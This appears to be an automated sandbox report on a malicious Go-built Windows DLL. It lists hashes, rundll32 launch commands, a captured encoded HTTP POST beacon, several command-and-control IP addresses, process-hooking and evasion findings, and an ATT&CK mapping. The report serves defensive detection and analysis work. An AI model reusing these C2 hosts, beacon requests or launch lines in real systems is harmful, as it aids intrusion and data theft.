Create Interactive Tour

Windows Analysis Report
file.dll

Overview

General Information

Sample name:	file.dll
Analysis ID:	1473486
MD5:	e6743e380f2418b616dca113dbbc93cb
SHA1:	6c051a6d3a183c24292d6821865a5a183b4ebb9c
SHA256:	eb7183f807b13b4524393b8da4cc242d96283a13ecd7331db1fcefd43986d0c9
Tags:	dll
Infos:

Detection

Score:	72
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

System process connects to network (likely due to code injection or exploit)

AI detected suspicious sample

Found Tor onion address

Overwrites code with unconditional jumps - possibly settings hooks in foreign process

Switches to a custom stack to bypass stack traces

Checks if the current process is being debugged

Creates a process in suspended mode (likely to inject code)

Entry point lies outside standard sections

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

PE / OLE file has an invalid certificate

PE file contains more sections than normal

PE file contains sections with non-standard names

Program does not show much activity (idle)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Uses 32bit PE files

Classification

Process Tree

System is w10x64

loaddll32.exe (PID: 6324 cmdline: loaddll32.exe "C:\Users\user\Desktop\file.dll" MD5: 51E6071F9CBA48E79F10C84515AAE618)

conhost.exe (PID: 6332 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 1416 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\file.dll",#1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

rundll32.exe (PID: 1204 cmdline: rundll32.exe "C:\Users\user\Desktop\file.dll",#1 MD5: 889B99C52A60DD49227C5E485A016679)

rundll32.exe (PID: 4100 cmdline: rundll32.exe C:\Users\user\Desktop\file.dll,MainFunc MD5: 889B99C52A60DD49227C5E485A016679)

rundll32.exe (PID: 2460 cmdline: rundll32.exe C:\Users\user\Desktop\file.dll,_cgo_dummy_export MD5: 889B99C52A60DD49227C5E485A016679)

rundll32.exe (PID: 7236 cmdline: rundll32.exe "C:\Users\user\Desktop\file.dll",MainFunc MD5: 889B99C52A60DD49227C5E485A016679)

rundll32.exe (PID: 7244 cmdline: rundll32.exe "C:\Users\user\Desktop\file.dll",_cgo_dummy_export MD5: 889B99C52A60DD49227C5E485A016679)

cleanup

HTTP traffic detected: POST / HTTP/1.1Host: 195.2.70.38User-Agent: Go-http-client/1.1Content-Length: 158X-Api-Key: cWH6SWQ2Accept-Encoding: gzipData Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Source: rundll32.exe, 0000000C.00000002.3802972667.000000000CDC6000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3802972667.000000000CE4F000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3802972667.000000000CDC4000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3802972667.000000000CC8A000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3802972667.000000000CC5E000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3802972667.000000000CE0C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://195.2.70.38
Source: rundll32.exe, 00000005.00000002.3802390448.000000000D4C6000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://195.2.70.38Go-http-client/1.1Go-http-client/1.1PM
Source: rundll32.exe, 0000000C.00000002.3802972667.000000000CD92000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://195.2.70.38Go-http-client/1.1http://91.142.74.28PM
Source: rundll32.exe, 00000005.00000002.3802390448.000000000D50A000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.3802390448.000000000D4C6000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.3802390448.000000000D410000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://195.2.70.38P
Source: rundll32.exe, 00000006.00000002.3802641816.000000000D05E000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3802641816.000000000D10C000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3802641816.000000000D0A0000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3802972667.000000000CE0C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://195.2.70.38PM
Source: rundll32.exe, 0000000C.00000002.3802972667.000000000CC8A000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://195.2.70.38http://91.142.74.28
Source: rundll32.exe, 0000000C.00000002.3802972667.000000000CC5E000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://195.2.70.38http://91.142.74.28PM
Source: rundll32.exe, 0000000C.00000002.3802972667.000000000CDC4000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3802972667.000000000CC8A000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3802972667.000000000CC5E000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3802972667.000000000CE0C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://77.238.224.56
Source: rundll32.exe, 00000005.00000002.3802390448.000000000D50A000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://77.238.224.56Go-http-client/1.1
Source: rundll32.exe, 00000005.00000002.3802390448.000000000D410000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://77.238.224.56Go-http-client/1.1P
Source: rundll32.exe, 0000000C.00000002.3802972667.000000000CE0C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://77.238.224.56Go-http-client/1.1X-Content-Type-OptionsTransfer-EncodingP
Source: rundll32.exe, 00000006.00000002.3802641816.000000000D206000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://77.238.224.56Go-http-client/1.1http://77.238.229.6377.238.250.123:80Go-http-client/1.1Go-http
Source: rundll32.exe, 0000000C.00000002.3802972667.000000000CD92000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://77.238.224.56Go-http-client/1.1http://77.238.229.6377.238.250.123:80Go-http-client/1.1http://
Source: rundll32.exe, 00000005.00000002.3802390448.000000000D410000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://77.238.224.56Go-http-client/1.1http://77.238.229.6377.238.250.123:80X-Content-Type-OptionsTra
Source: rundll32.exe, 00000005.00000002.3802390448.000000000D4C6000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.3802390448.000000000D410000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3802641816.000000000D05E000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3802641816.000000000D10C000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3802972667.000000000CC5E000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://77.238.224.56PM
Source: rundll32.exe, 0000000C.00000002.3802972667.000000000CDC4000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3802972667.000000000CC8A000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3802972667.000000000CC5E000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3802972667.000000000CE0C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://77.238.229.63
Source: rundll32.exe, 00000005.00000002.3802390448.000000000D4C6000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3802641816.000000000D0A0000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3802972667.000000000CE0C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://77.238.229.6377.238.250.123:80
Source: rundll32.exe, 00000006.00000002.3802641816.000000000D05E000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://77.238.229.6377.238.250.123:80Go-http-client/1.1P
Source: rundll32.exe, 0000000C.00000002.3802972667.000000000CC5E000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://77.238.229.6377.238.250.123:80Go-http-client/1.1PM
Source: rundll32.exe, 0000000C.00000002.3802972667.000000000CC8A000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://77.238.229.6377.238.250.123:80Go-http-client/1.1X-Content-Type-OptionsTransfer-EncodingP
Source: rundll32.exe, 00000005.00000002.3807321250.000000000D612000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3802641816.000000000D0A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://77.238.229.6377.238.250.123:80P
Source: rundll32.exe, 00000005.00000002.3802390448.000000000D50A000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.3802390448.000000000D4C6000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.3807321250.000000000D612000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3802641816.000000000D05E000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3802641816.000000000D0A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://77.238.229.6377.238.250.123:80PM
Source: rundll32.exe, 00000006.00000002.3802641816.000000000D206000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://77.238.229.6377.238.250.123:80User-Agent:
Source: rundll32.exe, 0000000C.00000002.3802972667.000000000CE0C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://77.238.229.6377.238.250.123:80http://195.2.70.38P
Source: rundll32.exe, 0000000C.00000002.3802972667.000000000CDC6000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3802972667.000000000CE4F000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3802972667.000000000CDC4000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://77.238.250.123
Source: rundll32.exe, 00000006.00000002.3802641816.000000000D182000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3802972667.000000000CDC6000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3802972667.000000000CE4F000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3802972667.000000000CDC4000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://77.238.250.123http://195.2.70.38
Source: rundll32.exe, 0000000C.00000002.3802972667.000000000CDC4000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3802972667.000000000CC8A000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3802972667.000000000CC5E000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3802972667.000000000CE0C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://91.142.74.28
Source: rundll32.exe, 00000005.00000002.3807321250.000000000D612000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://91.142.74.28Go-http-client/1.1Go-http-client/1.1X-Content-Type-OptionsTransfer-EncodingGo-htt
Source: rundll32.exe, 00000006.00000002.3802641816.000000000D0A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://91.142.74.28Go-http-client/1.1PM
Source: rundll32.exe, 00000005.00000002.3807321250.000000000D612000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://91.142.74.28Go-http-client/1.1http://77.238.224.56
Source: rundll32.exe, 0000000C.00000002.3802972667.000000000CC5E000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://91.142.74.28Go-http-client/1.1http://77.238.224.56Go-http-client/1.1http://195.2.70.38http://
Source: rundll32.exe, 00000006.00000002.3802641816.000000000D05E000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3802641816.000000000D10C000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3802641816.000000000D0A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://91.142.74.28PM
Source: rundll32.exe, 0000000C.00000002.3802972667.000000000CE0C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://91.142.74.28User-Agent:
Source: rundll32.exe, 0000000C.00000002.3802972667.000000000CC8A000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://91.142.74.28http://77.238.224.56Go-http-client/1.1http://77.238.229.6377.238.250.123:80
Source: rundll32.exe, 00000006.00000002.3802641816.000000000D10C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://91.142.74.28http://77.238.224.56X-Content-Type-OptionsTransfer-EncodingGo-http-client/1.1http
Source: file.dll	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: file.dll	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: file.dll	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: file.dll	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: file.dll	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: file.dll	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: file.dll	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: file.dll	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: file.dll	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: file.dll	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: file.dll	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: file.dll	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: file.dll	String found in binary or memory: http://ocsp.digicert.com0A
Source: file.dll	String found in binary or memory: http://ocsp.digicert.com0C
Source: file.dll	String found in binary or memory: http://ocsp.digicert.com0N
Source: file.dll	String found in binary or memory: http://ocsp.digicert.com0X
Source: file.dll	String found in binary or memory: http://www.digicert.com/CPS0
Source: file.dll	String found in binary or memory: https://www.digicert.com/CPS0

Source: file.dll

Static PE information: invalid certificate

Source: file.dll

Static PE information: Number of sections : 12 > 10

Source: file.dll

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED, DLL

Source: classification engine

Classification label: mal72.evad.winDLL@14/0@0/5

Source: C:\Windows\SysWOW64\rundll32.exe

File created: C:\Users\user\AppData\Local\config

Jump to behavior

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6332:120:WilError_03

Source: C:\Windows\System32\loaddll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\file.dll,MainFunc

Source: file.dll

ReversingLabs: Detection: 13%

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\file.dll"
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\file.dll",#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\file.dll,MainFunc
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\file.dll,_cgo_dummy_export
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",MainFunc
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",_cgo_dummy_export
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\file.dll",#1	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\file.dll,MainFunc	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\file.dll,_cgo_dummy_export	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",MainFunc	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",_cgo_dummy_export	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",#1	Jump to behavior

Source: C:\Windows\System32\loaddll32.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior

Source: file.dll

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: file.dll

Static PE information: Image base 0x6c2c0000 > 0x60000000

Source: file.dll

Static file information: File size 13860360 > 1048576

Source: file.dll

Static PE information: Raw size of .rdata2 is bigger than: 0x100000 < 0xd32a00

Source: file.dll

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: initial sample

Static PE information: section where entry point is pointing to: .rdata2

Source: file.dll	Static PE information: section name: .rdata0
Source: file.dll	Static PE information: section name: .rdata1
Source: file.dll	Static PE information: section name: .rdata2

Hooking and other Techniques for Hiding and Protection

Overwrites code with unconditional jumps - possibly settings hooks in foreign process

Source: C:\Windows\System32\loaddll32.exe	Memory written: PID: 6324 base: 660005 value: E9 8B 2F 10 77	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Memory written: PID: 6324 base: 77762F90 value: E9 7A D0 EF 88	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 4100 base: 2F10005 value: E9 8B 2F 85 74	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 4100 base: 77762F90 value: E9 7A D0 7A 8B	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 1204 base: 2A80005 value: E9 8B 2F CE 74	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 1204 base: 77762F90 value: E9 7A D0 31 8B	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 2460 base: 27F0005 value: E9 8B 2F F7 74	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 2460 base: 77762F90 value: E9 7A D0 08 8B	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 7236 base: 2A50005 value: E9 8B 2F D1 74	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 7236 base: 77762F90 value: E9 7A D0 2E 8B	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 7244 base: 2DA0005 value: E9 8B 2F 9C 74	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 7244 base: 77762F90 value: E9 7A D0 63 8B	Jump to behavior

Source: C:\Windows\System32\loaddll32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Windows\System32\loaddll32.exe	API/Special instruction interceptor: Address: 6CA2AEB1
Source: C:\Windows\System32\loaddll32.exe	API/Special instruction interceptor: Address: 6D37C645
Source: C:\Windows\System32\loaddll32.exe	API/Special instruction interceptor: Address: 6D3942F3
Source: C:\Windows\System32\loaddll32.exe	API/Special instruction interceptor: Address: 6C866C25
Source: C:\Windows\System32\loaddll32.exe	API/Special instruction interceptor: Address: 6C96FCDB
Source: C:\Windows\System32\loaddll32.exe	API/Special instruction interceptor: Address: 6D306499
Source: C:\Windows\System32\loaddll32.exe	API/Special instruction interceptor: Address: 6C81770E
Source: C:\Windows\System32\loaddll32.exe	API/Special instruction interceptor: Address: 6D3988EB
Source: C:\Windows\System32\loaddll32.exe	API/Special instruction interceptor: Address: 6C734C05
Source: C:\Windows\System32\loaddll32.exe	API/Special instruction interceptor: Address: 6C6EF3E0
Source: C:\Windows\System32\loaddll32.exe	API/Special instruction interceptor: Address: 6C74D2C7
Source: C:\Windows\System32\loaddll32.exe	API/Special instruction interceptor: Address: 6C7846CE
Source: C:\Windows\System32\loaddll32.exe	API/Special instruction interceptor: Address: 6D2A2222

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Windows\System32\loaddll32.exe

Thread delayed: delay time: 120000

Jump to behavior

Source: rundll32.exe, 00000005.00000002.3799758939.0000000002F47000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllu
Source: rundll32.exe, 00000006.00000002.3800604504.0000000002C6A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll5
Source: loaddll32.exe, 00000001.00000002.1467735182.000000000096E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll1
Source: rundll32.exe, 0000000C.00000002.3799669246.000000000271A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllD

Source: C:\Windows\System32\loaddll32.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort	Jump to behavior

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 77.238.229.63 80	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 195.2.70.38 80	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 77.238.224.56 80	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 91.142.74.28 80	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 77.238.250.123 80	Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",#1

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Queries volume information: C:\Users\user\AppData\Local\config VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Queries volume information: C:\Users\user\AppData\Local\config VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Queries volume information: C:\Users\user\AppData\Local\config VolumeInformation	Jump to behavior

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	1 DLL Side-Loading	111 Process Injection	1 Masquerading	1 Credential API Hooking	111 Security Software Discovery	Remote Services	1 Credential API Hooking	1 Non-Application Layer Protocol	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Rundll32	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	Data from Removable Media	1 Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	11 Virtualization/Sandbox Evasion	Security Account Manager	11 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Proxy	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	111 Process Injection	NTDS	111 System Information Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	Internet Connection Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
file.dll	14%	ReversingLabs

Source	Detection	Scanner	Label
http://91.142.74.28http://77.238.224.56X-Content-Type-OptionsTransfer-EncodingGo-http-client/1.1http	0%	Avira URL Cloud	safe
http://77.238.229.6377.238.250.123:80User-Agent:	0%	Avira URL Cloud	safe
http://77.238.224.56PM	0%	Avira URL Cloud	safe
http://77.238.224.56Go-http-client/1.1	0%	Avira URL Cloud	safe
http://77.238.229.63/	0%	Avira URL Cloud	safe
http://77.238.229.6377.238.250.123:80Go-http-client/1.1X-Content-Type-OptionsTransfer-EncodingP	0%	Avira URL Cloud	safe
http://77.238.229.6377.238.250.123:80Go-http-client/1.1PM	0%	Avira URL Cloud	safe
http://91.142.74.28Go-http-client/1.1http://77.238.224.56Go-http-client/1.1http://195.2.70.38http://	0%	Avira URL Cloud	safe
http://77.238.229.6377.238.250.123:80P	0%	Avira URL Cloud	safe
http://195.2.70.38PM	0%	Avira URL Cloud	safe
http://77.238.224.56Go-http-client/1.1P	0%	Avira URL Cloud	safe
http://77.238.224.56Go-http-client/1.1X-Content-Type-OptionsTransfer-EncodingP	0%	Avira URL Cloud	safe
http://195.2.70.38/	0%	Avira URL Cloud	safe
http://77.238.250.123/	0%	Avira URL Cloud	safe
http://77.238.229.6377.238.250.123:80PM	0%	Avira URL Cloud	safe
http://91.142.74.28Go-http-client/1.1PM	0%	Avira URL Cloud	safe
http://77.238.224.56	0%	Avira URL Cloud	safe
http://77.238.229.63	0%	Avira URL Cloud	safe
